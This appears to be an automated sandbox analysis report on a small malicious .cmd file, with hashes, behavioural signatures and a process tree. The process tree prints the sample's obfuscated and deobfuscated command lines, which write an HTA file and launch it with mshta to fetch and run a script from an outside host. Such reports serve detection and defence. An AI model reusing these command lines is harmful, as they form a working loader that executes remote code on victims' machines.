Analysis
- max time kernel: 117s
- max time network: 129s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 14-01-2022 07:00
Static task: static1
Behavioral task: behavioral1
- Sample: 536749.742.67513.78924_208.69621.4895824ã.cmd
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: 536749.742.67513.78924_208.69621.4895824ã.cmd
- Resource: win10-en-20211208
General
- Target: 536749.742.67513.78924_208.69621.4895824ã.cmd
- Size: 344B
- MD5: 19461ec95d2ed8da4cc2c4d9550aa125
- SHA1: 16a95e645237cfcf43e1ac67608783513e7dbfe3
- SHA256: 758416f5eaeb77570a9529e928cf21a38e803664412a198452719a8b9e994d19
- SHA512: 4e4d8e9fe6969546c188f02c28525bcaf589801c72054e2e116d05189e6004283a395110717b8936d520ebedc4e9b3b49bc6327d395689c186e695942a03adbe
Malware Config
Signatures
- Blocklisted process makes network request (3 IoCs)
  Processes (flow, pid, process):
  - flow 19, pid 856, mshta.exe
  - flow 21, pid 856, mshta.exe
  - flow 23, pid 856, mshta.exe
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes (description, pid, process, target process):
  - PID 1804 wrote to memory of 1776, pid 1804, cmd.exe, cmd.exe
  - PID 1804 wrote to memory of 1776, pid 1804, cmd.exe, cmd.exe
  - PID 1776 wrote to memory of 2892, pid 1776, cmd.exe, cmd.exe
  - PID 1776 wrote to memory of 2892, pid 1776, cmd.exe, cmd.exe
  - PID 1776 wrote to memory of 3380, pid 1776, cmd.exe, cmd.exe
  - PID 1776 wrote to memory of 3380, pid 1776, cmd.exe, cmd.exe
  - PID 3380 wrote to memory of 1312, pid 3380, cmd.exe, cmd.exe
  - PID 3380 wrote to memory of 1312, pid 3380, cmd.exe, cmd.exe
  - PID 1312 wrote to memory of 856, pid 1312, cmd.exe, mshta.exe
  - PID 1312 wrote to memory of 856, pid 1312, cmd.exe, mshta.exe
Processes
- [1] C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\536749.742.67513.78924_208.69621.4895824ã.cmd"
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\cmd.exe
    Command line: cmd /V/D/c "seT sKk=script&&seT px=mshta&&SEt AJKP=C:\Users\Public\Videos\^dOW&&SEt GSEM=^<!sKk!^>try{vfYYar c='!sKk!:';d='hfYYTtP:';GfYYetObjfYYect(c+d+'&&sET 9IF=BOTKRBOTKRa9eikr.5wyck43a9uxnu7e.cfdBOTKR?1BOTKR');}catch(e){}close();^</!sKk!^>&&sEt/^p JGDH="!GSEM:fYY=!!9IF:BOTKR=/!"<nul > !AJKP!.Hta|start /MIN CMD /c !px! !AJKP!.HtA "
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /S /D /c" sEt/p JGDH="<script>try{var c='script:';d='hTtP:';GetObject(c+d+'//a9eikr.5wyck43a9uxnu7e.cfd/?1/');}catch(e){}close();</script>" 0<nul 1>C:\Users\Public\Videos\dOW.Hta"
    - [3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /S /D /c" start /MIN CMD /c mshta C:\Users\Public\Videos\dOW.HtA "
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        Command line: CMD /c mshta C:\Users\Public\Videos\dOW.HtA
        Signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\mshta.exe
          Command line: mshta C:\Users\Public\Videos\dOW.HtA
          Signatures: Blocklisted process makes network request
Network
MITRE ATT&CK Matrix
Downloads
- C:\Users\Public\Videos\dOW.HtA
  MD5: 4493b5e3f684c33ba8ee862f2fdb9944
  SHA1: e489710719416946503438f5675da901b8ee0dd8
  SHA256: f1c703ab466011aaf49c4f2284a0a0d9c85f53095369022648d32692271ede2a
  SHA512: 3a8b5a970621eea4bab132b7ed85394d90295a93c3c834386ee3c27c6fde3c8128e08d182f7ab84759822f785fa32dd4a1b3b2e65162271deb4183b48887969a
- memory/856-121-0x0000000000000000-mapping.dmp
- memory/856-122-0x0000020A0F608000-0x0000020A0F610000-memory.dmp
  Filesize: 32KB
- memory/1312-120-0x0000000000000000-mapping.dmp
- memory/1776-117-0x0000000000000000-mapping.dmp
- memory/2892-118-0x0000000000000000-mapping.dmp
- memory/3380-119-0x0000000000000000-mapping.dmp